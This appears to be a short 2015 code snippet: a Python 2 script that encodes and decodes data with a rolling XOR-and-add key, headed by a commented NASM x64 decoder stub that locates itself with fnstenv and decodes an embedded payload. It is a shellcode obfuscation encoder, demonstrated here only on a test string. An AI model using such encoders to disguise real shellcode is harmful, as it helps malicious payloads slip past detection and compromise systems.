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Created July 19, 2015 20:02
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# Nasm code for the stub.
# ________
# global start
# section .text
# start:
# mov rax, 0x0123456789ABCDEF ; set the key.
# fcmovbe st0, st3 ; ?
# ; fnstenv [rsp-0xc] ; place floating env on the stack. Align EIP to RSP.
# fnstenv [rsp] ; place floating env on the stack.
# xor rbx,rbx ; make sure rbx is 0
# ; mov [rsp+0x4], ebx ; place 4 bytes
# mov ebx, [rsp+0xc] ; grab EIP from the stack
# xor rcx,rcx
# mov cl, 0x7
# Decode:
# ;xor [rbx+0x28], rax
# ;add rax, [rbx+0x28]
# xor [rbx+0x1f], rax
# add rax, [rbx+0x1f]
# add rbx, 0x8
# loop Decode
# section .data
# Payload: db `\xde\xff\x98\xbdRs\x149aB\x9c\xf9\xd9=\x1dq5\x07qV\xab\x8f1\x11`
# .len: equ $ - Payload
import ctypes
import struct
import hexdump
IV = 0x0123456789ABCDEF
def pad_message(message):
mod = 0
if len(message) < QWORD_SIZE:
mod = QWORD_SIZE - len(message)
elif len(message) % QWORD_SIZE > 0:
mod = QWORD_SIZE - (len(message) % QWORD_SIZE)
return message + "\x90" * mod
def encode(message):
key = IV
blocks = [message[i:i+QWORD_SIZE] for i in xrange(0,len(message),QWORD_SIZE)]
ct_message = ""
for block in blocks:
plain_value = struct.unpack("<Q", block)[0]
enc_value = plain_value ^ key
ct_message += struct.pack("<Q", enc_value)
key = ctypes.c_uint64(plain_value + key).value
return ct_message
def decode(ct_message):
key = IV
blocks = [ct_message[i:i+QWORD_SIZE] for i in xrange(0,len(ct_message),QWORD_SIZE)]
message = ""
for block in blocks:
enc_value = struct.unpack("<Q", block)[0]
plain_value = enc_value ^ key
message += struct.pack("<Q", plain_value)
key = ctypes.c_uint64(plain_value + key).value
return message
m = pad_message("12345678ABCDEFGHTESTIN")
print repr(m)
ct = encode(m)
print repr(ct)
m = decode(ct)
print repr(m)
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